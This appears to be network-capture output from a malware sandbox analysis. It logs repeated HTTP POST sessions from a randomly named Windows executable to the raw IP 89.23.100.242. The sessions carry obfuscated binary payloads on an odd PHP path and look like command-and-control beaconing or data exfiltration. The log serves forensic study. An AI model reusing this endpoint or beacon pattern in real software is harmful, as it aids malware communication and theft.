                                                                                                Jan 10, 2025 07:59:09.725706100 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:09.725742102 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.283348083 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.284368992 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.284399986 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.284440041 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.284440041 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.404982090 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.405539989 CET5011880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.410283089 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.410345078 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.410439014 CET805011889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.410526991 CET5011880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.410666943 CET5011880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.415596008 CET805011889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.767287970 CET5011880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.772316933 CET805011889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.772351027 CET805011889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.772361040 CET805011889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.971260071 CET5011980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.971456051 CET5011880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.976527929 CET805011989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:10.976614952 CET5011980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.976708889 CET5011980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:10.981651068 CET805011989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.022134066 CET805011889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.026875973 CET805011889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.026916981 CET5011880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:11.094310999 CET5012080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:11.099529028 CET805012089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.101411104 CET5012080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:11.101484060 CET5012080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:11.106375933 CET805012089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.329791069 CET5011980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:11.334995985 CET805011989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.335174084 CET805011989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.454806089 CET5012080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:11.459842920 CET805012089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.459856033 CET805012089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.459863901 CET805012089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.816303968 CET805011989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.861016035 CET5011980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:11.908229113 CET805012089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:11.954679966 CET5012080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.026808023 CET5011980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.031193018 CET5012080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.032164097 CET805011989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.032246113 CET5011980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.041757107 CET805012089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.041832924 CET5012080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.044698000 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.049642086 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.049746990 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.049834013 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.054641962 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.407872915 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.412935019 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.412947893 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.412957907 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.808871984 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.858401060 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:12.944700003 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.985918999 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.059009075 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.065212011 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.065287113 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.065357924 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.070949078 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.423511028 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.428926945 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.428963900 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.428996086 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.819375038 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.860941887 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.956799030 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.001568079 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.074270964 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.074528933 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.079535007 CET805012389.23.100.242192.168.2.4
• 89.23.100.242
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:30.531393051 CET | 530 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:31.274888992 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:31.379204035 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Jan 10, 2025 07:57:31.429939985 CET | 506 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 384
Expect: 100-continue
Jan 10, 2025 07:57:31.670556068 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:31.931037903 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Jan 10, 2025 07:57:31.952721119 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 1820
Expect: 100-continue
Jan 10, 2025 07:57:32.194262981 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:32.441204071 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:31.519287109 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:57:32.255752087 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:32.408117056 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:32.606549025 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:57:33.361191988 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:33.496560097 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:33.496103048 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2020
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:34.259073019 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:34.394682884 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:33.686378002 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:34.450289965 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:34.586520910 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49743 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:34.840650082 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:35.189908981 CET2544OUTData Raw: 59 55 43 56 5b 5a 56 51 58 5b 57 56 50 53 5b 53 55 52 5e 5c 54 59 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUCV[ZVQX[WVPS[SUR^\TYQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C;1+]>=9[<%<]8*:>=(_+++#';<3?Y)/%['':'_!/Y.
                                                                                                Jan 10, 2025 07:57:35.573590040 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:35.725929022 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:35.943367958 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:57:36.298312902 CET | 2544 | OUT | Data Raw: 5c 54 43 5f 5e 56 56 5f 58 5b 57 56 50 5e 5b 56 55 51 5e 5a 54 5b 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \TC_^VV_X[WVP^[VUQ^ZT[Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1,<>"?(-*( );$Y!B'Q+$><=&-<]''_!/Y.=
Jan 10, 2025 07:57:36.700068951 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:36.833344936 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:57:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:39.413741112 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2032
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:57:39.767108917 CET | 2032 | OUT | Data Raw: 59 57 46 55 5e 5b 56 56 58 5b 57 56 50 59 5b 51 55 55 5e 5c 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YWFU^[VVX[WVPY[QUU^\TPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.!,+=+&(8)-W+. X?<!/T+ **B1=3*'_!/Y.!
Jan 10, 2025 07:57:40.175774097 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:40.310460091 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:57:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 1e 39 53 20 15 06 55 31 01 07 11 3a 01 21 53 2b 0e 06 1d 2a 5b 33 1d 3e 0a 23 1f 2e 2f 23 56 21 05 0b 5e 28 0c 2e 57 33 02 24 1f 25 27 21 59 0c 13 26 5b 3d 3a 00 08 29 2a 02 5a 28 0f 0b 1c 27 23 3c 01 27 3e 3e 0d 37 11 0e 5e 3e 3a 25 53 2a 32 2d 10 39 2a 38 5a 3d 3c 33 0e 30 0c 2a 57 0c 1f 26 1f 36 0c 39 13 22 1c 07 05 24 38 06 0f 25 28 30 1c 24 3c 37 59 20 39 23 1d 2e 07 37 05 35 00 0a 12 3e 58 3d 0d 36 22 33 0c 3c 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 989S U1:!S+*[3>#./#V!^(.W3$%'!Y&[=:)*Z('#<'>>7^>:%S*2-9*8Z=<30*W&69"$8%(0$<7Y 9#.75>X=6"3< Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:40.753892899 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:57:41.111181974 CET | 2544 | OUT | Data Raw: 5c 55 46 50 5e 56 56 52 58 5b 57 56 50 5c 5b 5a 55 50 5e 5e 54 58 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \UFP^VVRX[WVP\[ZUP^^TXQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,!]>-!_(</"+= +(+!$?0?=Y=&[<X0'_!/Y.
Jan 10, 2025 07:57:41.504169941 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:41.656285048 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:57:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49748 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:42.188240051 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:57:42.532938004 CET | 2544 | OUT | Data Raw: 59 54 43 5f 5e 5b 56 52 58 5b 57 56 50 5f 5b 5b 55 53 5e 5d 54 51 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YTC_^[VRX[WVP_[[US^]TQQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A/W3?-1Z<,:W(4<$5+T+3Z*Y*$>70'_!/Y.9
Jan 10, 2025 07:57:42.925580978 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:43.052711010 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:57:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49750 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:44.026431084 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:57:44.376519918 CET | 2544 | OUT | Data Raw: 59 55 43 5e 5e 58 56 57 58 5b 57 56 50 58 5b 53 55 55 5e 5e 54 50 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YUC^^XVWX[WVPX[SUU^^TPQ[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'.!Z<=%\(Y,:?#(^8"7(*#+><>2=,]3*'_!/Y.%
